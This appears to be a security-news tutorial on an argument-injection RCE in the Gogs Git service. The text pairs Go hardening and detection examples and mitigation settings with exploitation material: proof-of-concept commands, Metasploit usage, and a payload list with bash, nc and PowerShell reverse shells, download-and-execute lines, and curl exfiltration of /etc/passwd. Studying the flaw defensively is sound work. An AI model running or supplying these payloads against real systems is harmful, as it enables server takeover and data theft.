
Introduction:
A critical argument injection vulnerability (CWE-88) has been discovered in Gogs, a popular open-source self-hosted Git service, allowing any authenticated user to achieve remote code execution (RCE) on the server. The flaw stems from insufficient sanitization of branch names during the "Rebase before merging" operation: the branch name is handed to `git rebase` as a positional argument with no `--` separator, so an attacker who names a branch so that it begins with `--exec=` injects the `--exec` flag and executes arbitrary commands with the privileges of the Gogs server process.
Learning Objectives:
– Understand the mechanics of argument injection vulnerabilities in Git-based applications
– Learn how to identify and exploit the Gogs RCE flaw through a malicious branch name
– Implement effective mitigation strategies to protect Gogs instances and similar systems
You Should Know:
1. Deep Dive: The Gogs Argument Injection RCE
The vulnerability exists because the `Merge()` function in `internal/database/pull.go` passes the PR base branch name to `git rebase` without a `--` separator. A branch named `--exec=
Step-by-Step Exploitation Guide (for authorized security testing only):
To test this vulnerability in a controlled environment, you can use the Python PoC from `portbuster1337/gogs-rce`:
# Clone the PoC repository
git clone https://github.com/portbuster1337/gogs-rce.git
cd gogs-rce
# Install dependencies
pip install requests
# Run pre-flight check to assess target
python3 gogs.py http://target:3000 --preflight-only
# Exploit with auto-registration and command execution
python3 gogs.py http://target:3000 --cmd "id > /tmp/pwned.txt"
# Exploit with existing credentials and reverse shell
python3 gogs.py http://target:3000 -u attacker -p Password123 --listener 10.0.0.2:4444
The exploit automatically creates a repository, pushes a malicious branch named `--exec=sh${IFS}.payload`, opens a pull request, and triggers the merge with `merge_style=rebase_before_merging`.
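To make the mechanism concrete, here is an added example in Go (the language Gogs is written in). It is not Gogs code and not part of the PoC: it builds the `git rebase` argv the vulnerable way and the hardened way, using a hypothetical `validateBranchName` allow-list modelled on git's ref-name rules, and shows how a `--` separator stops the injected `--exec` from being parsed as an option. The function and variable names are this example's own.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// ErrBadBranch is returned for any name that must not reach the git argv.
var ErrBadBranch = errors.New("refusing branch name")

// unsafeRebaseArgv reproduces the pattern the article describes: the base
// branch name is appended to the rebase command line with no "--" separator,
// so a name such as "--exec=sh${IFS}.payload" is parsed by git as an option.
func unsafeRebaseArgv(baseBranch string) []string {
	return []string{"git", "rebase", baseBranch}
}

// validateBranchName is a conservative allow-list modelled on the rules of
// git check-ref-format, plus a refusal of anything option-like. It is an
// illustration written for this article, not Gogs code.
func validateBranchName(name string) error {
	switch {
	case name == "":
		return fmt.Errorf("%w: empty", ErrBadBranch)
	case strings.HasPrefix(name, "-"):
		return fmt.Errorf("%w: %q would be parsed as an option", ErrBadBranch, name)
	case strings.HasPrefix(name, "/"), strings.HasSuffix(name, "/"),
		strings.HasSuffix(name, "."), strings.HasSuffix(name, ".lock"):
		return fmt.Errorf("%w: %q has a forbidden prefix or suffix", ErrBadBranch, name)
	}
	for _, seq := range []string{"..", "//", "@{", "\\"} {
		if strings.Contains(name, seq) {
			return fmt.Errorf("%w: %q contains %q", ErrBadBranch, name, seq)
		}
	}
	for _, r := range name {
		// control characters and the characters git forbids in ref names
		if r < 0x20 || r == 0x7f || strings.ContainsRune(" ~^:?*[", r) {
			return fmt.Errorf("%w: %q contains forbidden character %q", ErrBadBranch, name, r)
		}
	}
	return nil
}

// safeRebaseArgv validates the name and then ends option parsing with "--",
// so even a name that slipped through validation cannot become a flag.
func safeRebaseArgv(baseBranch string) ([]string, error) {
	if err := validateBranchName(baseBranch); err != nil {
		return nil, err
	}
	return []string{"git", "rebase", "--", baseBranch}, nil
}

// carriesExec reports whether git would see an --exec/-x option in argv:
// it stops scanning at "--", as git's option parser does.
func carriesExec(argv []string) bool {
	for _, a := range argv[2:] { // skip "git" and "rebase"
		if a == "--" {
			return false
		}
		if a == "--exec" || strings.HasPrefix(a, "--exec=") || strings.HasPrefix(a, "-x") {
			return true
		}
	}
	return false
}

func main() {
	malicious := "--exec=sh${IFS}.payload" // the PoC's branch name, from the article
	fmt.Println("vulnerable argv:", unsafeRebaseArgv(malicious),
		"exec injected:", carriesExec(unsafeRebaseArgv(malicious)))
	if _, err := safeRebaseArgv(malicious); err != nil {
		fmt.Println("hardened:", err)
	}
	argv, _ := safeRebaseArgv("feature/login")
	fmt.Println("hardened argv:", argv)
}
```

The two controls are deliberately independent: the allow-list rejects the name at the application boundary, and `--` guarantees that whatever reaches the argv is positional. Either alone would have blocked the PoC branch name; together they also cover names the allow-list did not anticipate.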
2. Linux & Windows Command Injection Payloads
During a penetration test, you may need to craft various payloads to achieve different post-exploitation goals. Below are examples for Linux and Windows environments.
Linux payloads (run as the Gogs server process user):
Basic command execution
--exec=sh${IFS}-c${IFS}'id; whoami; hostname'
Reverse shell (bash)
--exec=sh${IFS}-c${IFS}'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
Reverse shell (nc)
--exec=sh${IFS}-c${IFS}'nc -e /bin/sh 10.0.0.1 4444'
Download and execute script
--exec=sh${IFS}-c${IFS}'wget http://10.0.0.1/payload.sh -O /tmp/payload.sh && chmod +x /tmp/payload.sh && /tmp/payload.sh'
Data exfiltration
--exec=sh${IFS}-c${IFS}'curl -X POST -d "$(cat /etc/passwd)" http://10.0.0.1/exfil'
Windows payloads (if Gogs is running on Windows):
Basic command execution
--exec=powershell${IFS}-Command${IFS}"whoami"
Reverse shell (PowerShell)
--exec=powershell${IFS}-Command${IFS}"`$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);`$stream = `$client.GetStream();[byte[]]`$bytes = 0..65535|%{0};while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0){`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0,`$i);`$sendback = (iex `$data 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$stream.Write(`$sendbyte,0,`$sendbyte.Length);`$stream.Flush()};`$client.Close()"
Download and execute
--exec=powershell${IFS}-Command${IFS}"Invoke-WebRequest -Uri http://10.0.0.1/payload.exe -OutFile C:\temp\payload.exe; Start-Process C:\temp\payload.exe"
Git refuses ref names that contain whitespace, so a raw space cannot appear in a branch name. `${IFS}` (the shell's Internal Field Separator) works as a stand-in because `git rebase --exec` runs its command through `sh -c`, and that shell expands and word-splits `${IFS}` into a separator at run time. Two caveats follow from this. Because the command passes through `sh` first, `sh` quoting rules apply before PowerShell ever sees the string: inside `sh` double quotes, backticks and `$` are interpreted by `sh`, so the PowerShell reverse shell above needs its quoting reworked (for example by passing the script as `-EncodedCommand`) before it survives that path. And on Windows the payloads depend on Git for Windows running the `--exec` command through its bundled `sh`; verify in a lab before relying on them.
3. Metasploit Module & Automation
Rapid7 has released a Metasploit module that automates the full exploit chain. Once it is integrated into your installed framework, use it as follows:
# Start Metasploit
msfconsole
# Load the Gogs RCE module
use exploit/multi/http/gogs_rebase_rce
# Set options
set RHOSTS target_ip
set RPORT 3000
set USERNAME attacker
set PASSWORD Password123
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST your_ip
set LPORT 4444
# Exploit
exploit
Additionally, the Python PoC supports various options for automation, including authenticating with an existing session cookie instead of credentials (check `python3 gogs.py --help` for the exact flag names):
python3 gogs.py http://target:3000 --cookie "i_like_gogs=abc123..." --cmd "id"
python3 gogs.py http://target:3000 -u myuser -pw mypassword --cmd "id"
4. Detection & Mitigation Strategies
Since no patch is available as of May 2026, detection and mitigation are critical. Use the following commands to check for compromise and implement workarounds. Note that a rebase process is short-lived, so the `ps` check only catches an exploit in flight; for after-the-fact review, audit the branch names stored in the repositories on disk and the reverse-proxy access log for merge requests.
Detection (Linux):
# Search for suspicious git processes
ps aux | grep "git rebase" | grep -E -- "--exec"
# Check for unauthorized pull requests in Gogs logs
grep -i "pull request" /path/to/gogs/logs/gogs.log | grep -E "(branch|--exec)"
# Search for unusual cron jobs or reverse shells
crontab -l | grep -E "(nc|bash|curl|wget)"
ss -tulpn | grep -E "(4444|1337|31337)"
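The same two checks as a small Go tool, added here as an example (it is not part of the PoC or of Gogs): it scans a process list for `git rebase` invocations carrying `--exec`/`-x`, and scans `git for-each-ref` output for branch names that git would parse as options or that embed `${IFS}`. Both sample inputs are constructed for illustration, not captured from a real incident.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample of `ps aux` output for illustration; not captured from
// a real incident.
const samplePS = `USER  PID %CPU %MEM COMMAND
gogs  4100  0.0  0.2 git rebase main
gogs  4201  0.3  0.2 git rebase --exec=sh${IFS}.payload
gogs  4202  0.0  0.1 sh -c sh${IFS}.payload
gogs  4300  0.0  0.2 git rebase -x ls feature/x
root     1  0.0  0.1 /sbin/init`

// Constructed sample of `git for-each-ref --format='%(refname)' refs/heads`
// run inside one bare repository.
const sampleRefs = `refs/heads/main
refs/heads/feature/login
refs/heads/--exec=sh${IFS}.payload
refs/heads/-x${IFS}id`

// rebaseExecRe matches a git rebase command line carrying --exec or -x in any
// spelling git accepts (--exec=CMD, --exec CMD, -x CMD, -xCMD).
var rebaseExecRe = regexp.MustCompile(`\bgit\b.*\brebase\b.*\s(?:--exec(?:=|\s)|-x\s?\S)`)

// findExecRebases returns the process-list lines that look like an exploited
// rebase; it is a point-in-time check, so run it repeatedly or from a cron job.
func findExecRebases(psOutput string) []string {
	var hits []string
	for _, line := range strings.Split(psOutput, "\n") {
		if rebaseExecRe.MatchString(line) {
			hits = append(hits, line)
		}
	}
	return hits
}

// suspiciousRefs returns branch refs whose name begins with "-" (which git's
// option parser would treat as a flag) or embeds a shell expansion such as
// ${IFS}; legitimate branch names have no reason to look like this.
func suspiciousRefs(forEachRefOutput string) []string {
	var out []string
	for _, line := range strings.Split(strings.TrimSpace(forEachRefOutput), "\n") {
		name := strings.TrimPrefix(line, "refs/heads/")
		if strings.HasPrefix(name, "-") || strings.Contains(name, "${") || strings.Contains(name, "$IFS") {
			out = append(out, line)
		}
	}
	return out
}

func main() {
	for _, h := range findExecRebases(samplePS) {
		fmt.Println("suspicious process:", h)
	}
	for _, r := range suspiciousRefs(sampleRefs) {
		fmt.Println("suspicious ref:", r)
	}
}
```

To use the ref check on a live instance, feed it the output of `git -C <repo.git> for-each-ref --format='%(refname)' refs/heads` for every bare repository under the Gogs repository root (the `ROOT` setting in the `[repository]` section of `app.ini`). A branch that starts with `-` is the artefact the exploit must leave behind, so this check works even after the rebase process has exited.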
Mitigation Workarounds:
1. Disable open registration: Set `DISABLE_REGISTRATION = true` in `custom/conf/app.ini`
2. Restrict repository creation: Set `MAX_CREATION_LIMIT = 0` or a very low number
3. Disable the "Rebase before merging" option: there is no global toggle, so each repository must be audited and the option disabled individually
4. Block the `--exec` pattern at the WAF or reverse proxy level: Use regex filtering on branch names in HTTP requests. Treat this as a weak, bypassable control: a branch can also arrive over SSH, where an HTTP proxy never sees it, and form bodies are URL-encoded (`--exec%3D`), so match against the decoded value
WAF rule example (nginx):
if ($request_body ~ "--exec=") {
return 403;
}
Caveat: nginx evaluates `if` in the rewrite phase, before the request body has been read, so `$request_body` is normally empty there and this rule will not fire as written. Use a body-inspecting engine such as ModSecurity in front of Gogs instead.
5. Advanced Hardening & Cloud Considerations
For organizations running Gogs in cloud environments, additional hardening is necessary to limit blast radius.
Kubernetes security context (limits what a compromised Gogs process can do; it does not prevent the RCE itself):
apiVersion: v1
kind: Pod
metadata:
  name: gogs
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
  containers:
  - name: gogs
    image: gogs/gogs
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
Note that `readOnlyRootFilesystem` is a container-level field, not a pod-level one, and that Gogs writes to its data and repository directories, so mount those as writable volumes or the service will not start.
AWS Security Group restrictions:
– Block inbound port 3000 (default Gogs web UI) from untrusted IPs
– Use a bastion host or VPN for administrative access
– Enable AWS WAF with custom rules to block `--exec` patterns
API security best practices:
– Rotate all API tokens and SSH keys immediately if compromise is suspected
– Implement mandatory 2FA for all users
– Audit all repositories for unauthorized changes, running `git log --oneline --since="2 weeks ago"` in each one
What Undercode Say:
– The Gogs RCE zero-day (CVSS 9.4) is a textbook example of CWE-88 argument injection, where unsanitized branch names are passed directly to `git rebase` without a `--` separator.
– With over 1,100 internet-facing instances (and many more internal), the attack surface is massive; default configurations with open registration and unlimited repos make exploitation trivial.
– The lack of a patch 72+ days after disclosure highlights the risks of relying on understaffed open-source projects; organizations must implement compensating controls immediately.
– Detection is challenging because the malicious branch name can be obfuscated (e.g., using `${IFS}`), but monitoring for `git rebase` processes with `--exec` flags, and auditing stored branch names that begin with `-`, can help.
– As a long-term solution, consider migrating to actively maintained alternatives like Gitea or GitLab, which have more robust security response teams.
Expected Output:
– Detection: Use `ps aux | grep "git rebase" | grep -E -- "--exec"` to identify malicious rebase processes
– Mitigation: Disable open registration (`DISABLE_REGISTRATION = true`), restrict repo creation, and block `--exec` patterns at the WAF
Prediction:
– -1 The absence of a patch for over two months suggests that Gogs maintainers may lack the resources or urgency to address critical vulnerabilities, leading to increased exploitation in the wild.
– -1 Automated scanning for this flaw will likely become widespread within weeks, resulting in mass compromises of poorly configured instances, especially in academic and small-team environments.
– +1 The disclosure will drive adoption of more secure Git hosting alternatives and push organizations to implement stronger input validation and secure coding practices.
– -1 Supply chain attacks leveraging compromised Gogs instances could inject backdoors into widely used open-source projects, amplifying the impact far beyond direct server compromise.
IT/Security Reporter URL:
Reported By: [Aleborges Cybersecurity](https://www.linkedin.com/posts/aleborges_cybersecurity-informationsecurity-exploitation-share-7465927009119105024-8eTh/) – Hackers Feeds